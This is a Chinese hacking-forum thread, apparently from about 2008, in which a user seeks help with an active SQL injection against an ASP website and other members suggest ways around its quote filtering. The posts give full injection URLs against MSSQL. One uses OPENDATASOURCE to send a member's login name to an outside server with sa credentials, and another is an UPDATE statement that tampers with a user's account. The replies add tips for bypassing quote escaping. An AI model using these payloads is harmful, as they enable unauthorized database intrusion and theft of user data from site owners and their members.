返回列表 发帖

[讨论]一个opendatasource的问题!

[讨论]一个opendatasource的问题!
议题作者:寂寞宝贝
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

今天遇到一个郁闷的问题!在使用opendatasource宏的时候出现的!大虾帮下!

注入点类型:数据、MSSQL 数据库显错模式、支持多语句、DB_OWNER权限

在执行

http://www.xxx.org/pulic/showinfo.asp?ID=271;insert into opendatasource('sqloledb','server=200.82.104.6;uid=sa;pwd=mypass;database=member').ly.member select LOGIN_NAME from member where USERID=1382--

提示如下出错信息
Microsoft OLE DB Provider for SQL Server 錯誤 '80040e14'

接近 'sqloledb' 之處的語法不正確。

/pulic/showinfo.asp, 列90

弄了半天没搞定!不会是连接的问题,因为他都没连接我,可是这个opendatasource我一直都是这样用的!从来没出过这个问题!麻烦大虾们给个思路!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP 赚更多的钱


寂寞宝贝
荣誉会员

对了DB_OWNER没办法列目录,服务器只开了80!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

寂寞宝贝
荣誉会员

TOP

测试了一段时间后,发现语句中貌似不能出现单引号,比如

&ID=247; update data set login='lonely' where USERID=1382--

这样就会报

Microsoft OLE DB Provider for SQL Server 錯誤 '80040e14'

接近 'lonely' 之處的語法不正確。

/publish/PublishInfo.asp, 列90


使用双引号就不会出现问题,但是语句中又不能缺少单引号!郁闷了! 执行
update data set login=lonely where USERID=1382--

这样也不会报错,但问题是这样语句肯定不会执行的!

TOP

Microsoft OLE DB Provider for SQL Server 錯誤 '80040e14'

接近 '' 之處的語法不正確。

/publish/PublishInfo.asp, 列90

这个是执行http://www.xxx.org/pulic/showinfo.asp?ID=271'   加了个'号的报错信息,看着好奇怪!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

remax
晶莹剔透§烈日灼然

TOP


单引号完全可以突破,请参考字符方式注入..
另送关键词一个

定义变量..比如@x...20字节够写什么?

帖子325 精华2 积分911 阅读权限50 在线时间79 小时 注册时间2005-10-25 最后登录2008-7-13 查看个人网站
查看详细资料引用 报告 回复 TOP 软件项目外包

沉渊
晶莹剔透§烈日灼然

TOP

注入点把引号双写了啦,想办法突破吧Dreamless world……
帖子25 精华0 积分179 阅读权限40 性别男 在线时间215 小时 注册时间2007-2-11 最后登录2008-6-30 查看详细资料引用 报告 回复 TOP 良辰择日,预测咨询,公司改名,权威易经

皇子
晶莹剔透§烈日灼然

TOP

返回列表